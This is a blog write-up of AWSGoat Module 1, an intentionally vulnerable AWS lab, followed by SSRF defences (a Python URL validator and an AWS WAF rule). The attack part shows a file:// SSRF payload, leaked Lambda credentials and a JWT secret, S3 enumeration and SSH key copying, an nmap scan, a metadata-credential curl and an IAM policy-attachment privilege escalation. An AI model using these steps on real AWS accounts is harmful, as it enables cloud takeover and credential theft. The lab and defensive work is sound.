AWSGoat solution Module 1

n00🔑
6 min read · Feb 8, 2025

Deploying the lab:

  1. Fork the repo.
  2. Enable the Actions.
  3. Add the keys as repository secrets:
     AWS_ACCESS_KEY
     AWS_SECRET_ACCESS_KEY
  4. Run the workflow for deployment.

https://d8on2u6jj9.execute-api.us-east-1.amazonaws.com/prod/react

Server Side Request Forgery (SSRF):

user1@pdfmerge.work : tester****@1**

After logging in, create a new post. When you specify a remote URL for the post image, capture the upload-image request.

The response gives us the URL of the image, which has been uploaded to an S3 bucket.

Change the image URL to a Burp Collaborator payload.

We can see both HTTP and DNS interactions in Burp Collaborator.

This confirms that requests are being made from the server side to a URL taken from user-supplied input.

Reading internal files using the file:// scheme: we are able to read the /etc/hosts file.

Reading environment variables (file:///proc/self/environ):

AWS_ACCESS_KEY_ID: ASIAYS2NSRAW65N2JVRASHLVL
AWS_DEFAULT_REGION: us-east-1
AWS_EXECUTION_ENV: AWS_Lambda_python3.9
AWS_LAMBDA_FUNCTION_MEMORY_SIZE: 256
AWS_LAMBDA_FUNCTION_NAME: blog-application-data
AWS_LAMBDA_FUNCTION_VERSION: $LATEST
AWS_LAMBDA_INITIALIZATION_TYPE: on-demand
AWS_LAMBDA_LOG_GROUP_NAME: /aws/lambda/blog-application-data
AWS_LAMBDA_LOG_STREAM_NAME: 2025/02/07/[$LATEST]9fc0cac072194557926b0ff1dec29176
AWS_LAMBDA_RUNTIME_API: 127.0.0.1:9001
AWS_REGION: us-east-1
AWS_SECRET_ACCESS_KEY: nViOAa3jsScAfNRCtT9O96jfkLmAPgS0W/oWIpmr
AWS_SESSION_TOKEN: [session token omitted]
AWS_XRAY_CONTEXT_MISSING: LOG_ERROR_HANDLER
AWS_XRAY_DAEMON_ADDRESS: 169.254.79.129
AWS_XRAY_DAEMON_PORT: 2000
_LAMBDA_TELEMETRY_LOG_FD: 3
JWT_SECRET: T2BYL6#]zc>Byuzu
LAMBDA_RUNTIME_DIR: /var/runtime
LAMBDA_TASK_ROOT: /var/task
LD_LIBRARY_PATH: /var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib
LANG: en_US.UTF-8
PATH: /var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin
PWD: /var/task
TZ: :UTC
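The leak above happens because the Lambda fetches whatever URL the post image field contains. As an added example (not AWSGoat's code), here is a destination check the image-fetch handler could run before making that request; the function name and the address policy it enforces are my own assumptions.

```python
# Added example, not AWSGoat's code: a destination check for a handler that fetches
# a user-supplied image URL. Policy (assumed): only http/https to public addresses.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _forbidden(ip) -> bool:
    # Loopback (e.g. the 127.0.0.1:9001 runtime API), link-local (169.254.0.0/16
    # holds the instance metadata endpoint and the X-Ray daemon), RFC1918/ULA,
    # multicast, unspecified and reserved ranges are all rejected.
    return (ip.is_loopback or ip.is_link_local or ip.is_private
            or ip.is_multicast or ip.is_unspecified or ip.is_reserved)


def is_safe_image_url(url: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a candidate remote image URL."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:           # rejects file://, gopher://, etc.
        return False, f"scheme not allowed: {scheme or '<none>'}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
        # Resolve every address the name maps to; numeric hosts need no DNS.
        answers = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    except (socket.gaierror, ValueError):
        return False, f"cannot resolve {host}"
    for answer in answers:
        ip = ipaddress.ip_address(answer[4][0].split("%")[0])
        if _forbidden(ip):
            return False, f"{host} resolves to forbidden address {ip}"
    return True, "ok"
```

The check has to run on the exact URL that is fetched, with redirects disabled or re-validated, because a redirect or a DNS answer that changes between check and fetch would otherwise sidestep it.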

Brute-forcing/enumerating permissions:

#Listing s3 buckets
aws s3api list-buckets
aws s3 ls

Found 3 buckets:

2025-02-05 23:34:23 dev-blog-awsgoat-bucket-590183827501
2025-02-05 23:34:23 do-not-delete-awsgoat-state-files-590183827501
2025-02-05 23:34:23 production-blog-awsgoat-bucket-590183827501

Checking the dev-blog-awsgoat-bucket-590183827501 bucket, we find a .ssh folder containing SSH keys.

aws s3 ls s3://dev-blog-awsgoat-bucket-590183827501 --recursive
aws s3 cp s3://dev-blog-awsgoat-bucket-590183827501/shared/files/.ssh/ /tmp/bucket/ --recursive

Scanning all the discovered IPs for open ports of common services:

nmap -Pn -vv 10.25.14.6 34.207.133.229 35.153.184.88 10.25.14.106 172.16.84.59 172.16.87.25 172.22.26.8 10.0.48.71 --top-ports 20 --min-rate 2000 -n

We are able to move laterally to an EC2 instance.

Checking the IAM role attached to it through the instance metadata service:

curl 169.254.169.254/latest/meta-data/iam/security-credentials/AWS_GOAT_ROLE

Logging in as AWS_GOAT_ROLE:

We can brute-force the permissions of AWS_GOAT_ROLE:

Try to list the policies attached to AWS_GOAT_ROLE:

arn:aws:iam::590183827501:policy/dev-ec2-lambda-policies
arn:aws:iam::aws:policy/AmazonS3FullAccess

Upon checking the “dev-ec2-lambda-policies” policy, I came to know that it has permissions like “create policy” and “attach policy”, which can be used for privesc.

But there is a caveat: the attach-policy permission is only allowed on

the blog_app_lambda-data role and the arn:aws:lambda:us-east-1:590183827501:function:blog-application-data Lambda function.

v1 is being used

Exploitation Steps

1️⃣ Attach AdministratorAccess to the Lambda’s IAM role
If you have iam:AttachRolePolicy, you can grant admin privileges:

aws iam attach-role-policy --role-name blog_app_lambda_data --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

➡️ This would give the Lambda function full control over AWS resources.

We already have the session credentials of the lambda “blog-application-data” function via SSRF, so once the policy is attached we have successfully escalated our privileges to AdministratorAccess.

aws iam get-account-authorization-details --profile lambda

Protections:

AWS WAF rule for Server Side Request Forgery (SSRF)

Step 1: Identify the Attack Pattern

The attack involves a malicious request attempting to access internal files using the file:// protocol:

GET /v1/save-content?value=file:///proc/self/environ HTTP/2

To block this, we’ll create an AWS WAF rule that detects and blocks requests containing file:// in the query string.

Step 2: Create a Web ACL

  1. Go to the AWS Management Console:
     • Navigate to AWS WAF & Shield.
  2. Create a Web ACL:
     • Click Create web ACL.
     • Name your Web ACL (e.g., SSRF-Protection-WebACL).
     • Select the AWS resource you want to protect (e.g., API Gateway, CloudFront, or ALB).
     • Choose the region where your resource is deployed.

Step 3: Add a Rule to Block file://

  1. Add a Rule:
     • Click Add rules and select Add my own rules and rule groups.
     • Rule type: Regular rule.
  2. Configure the Rule:
     • Name: Block-File-Protocol.
     • Action: Block.
     • If a request: matches the statement.
     • Inspect: Query string.
     • Match type: Contains string.
     • String to match: file://.
     • Text transformation: Select URL decode (to handle encoded payloads like file%3A%2F%2F).
  3. Save the Rule:
     • Add the rule to your Web ACL.

Step 4: Associate the Web ACL with Your Resource

  • After creating the Web ACL, associate it with the resource you want to protect (e.g., API Gateway, CloudFront, or ALB).
  • In the AWS WAF console:
     • Select your Web ACL.
     • Click Associated AWS resources.
     • Click Add AWS resources.
     • Select your API Gateway, CloudFront distribution, or ALB.
     • Click Add.

Step 5: Test the Configuration

  • Send a test request to your endpoint with the file:// payload:

GET /v1/save-content?value=file:///proc/self/environ HTTP/2

  • Verify that the request is blocked by AWS WAF.
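The same rule can be created from the CLI, and its match logic can be checked before it goes live. As an added example (not the page's or AWS's own code), build_block_file_rule() emits the rule from Steps 2 and 3 in the JSON shape accepted by `aws wafv2 create-web-acl --rules`, and rule_matches() emulates the CONTAINS match with the configured text transformations over constructed query strings; the MetricName and the extra_transformations parameter are my own assumptions.

```python
# Added example, not the page's or AWS's own code. build_block_file_rule() emits the
# rule from Steps 2-3 in the JSON shape `aws wafv2 create-web-acl --rules` accepts
# (AWS CLI v2 expects blob fields such as SearchString base64-encoded); rule_matches()
# emulates the CONTAINS match plus the listed text transformations offline.
import base64
from urllib.parse import unquote


def build_block_file_rule(priority: int = 0, extra_transformations=()) -> dict:
    transformations = ["URL_DECODE", *extra_transformations]   # URL decode first
    return {
        "Name": "Block-File-Protocol",
        "Priority": priority,
        "Action": {"Block": {}},
        "Statement": {"ByteMatchStatement": {
            "FieldToMatch": {"QueryString": {}},
            "PositionalConstraint": "CONTAINS",
            "SearchString": base64.b64encode(b"file://").decode(),
            "TextTransformations": [
                {"Priority": i, "Type": t} for i, t in enumerate(transformations)],
        }},
        "VisibilityConfig": {"SampledRequestsEnabled": True,
                             "CloudWatchMetricsEnabled": True,
                             "MetricName": "BlockFileProtocol"},   # assumed name
    }


def rule_matches(rule: dict, query_string: str) -> bool:
    """Apply the rule's transformations in priority order, then test CONTAINS."""
    stmt = rule["Statement"]["ByteMatchStatement"]
    needle = base64.b64decode(stmt["SearchString"]).decode()
    text = query_string
    for t in sorted(stmt["TextTransformations"], key=lambda x: x["Priority"]):
        if t["Type"] == "URL_DECODE":
            text = unquote(text)        # a single decoding pass, as WAF does
        elif t["Type"] == "LOWERCASE":
            text = text.lower()
        else:
            raise ValueError(f"transformation {t['Type']} is not emulated here")
    return needle in text


# Constructed query strings shaped like the write-up's request (not real traffic).
SAMPLES = {
    "plain": "value=file:///proc/self/environ",
    "encoded": "value=file%3A%2F%2F%2Fproc%2Fself%2Fenviron",
    "benign": "value=https://example.com/cat.png",
}
```

Adding LOWERCASE as a second transformation makes the match case-insensitive, which a plain file:// string match is not; a rule like this is a stop-gap for one payload shape, and the application-side URL allowlist remains the primary fix.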

IAM Access Analyzer

IAM Access Analyzer helps identify overly permissive IAM policies and unintended external access in AWS.

Written by n00🔑

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u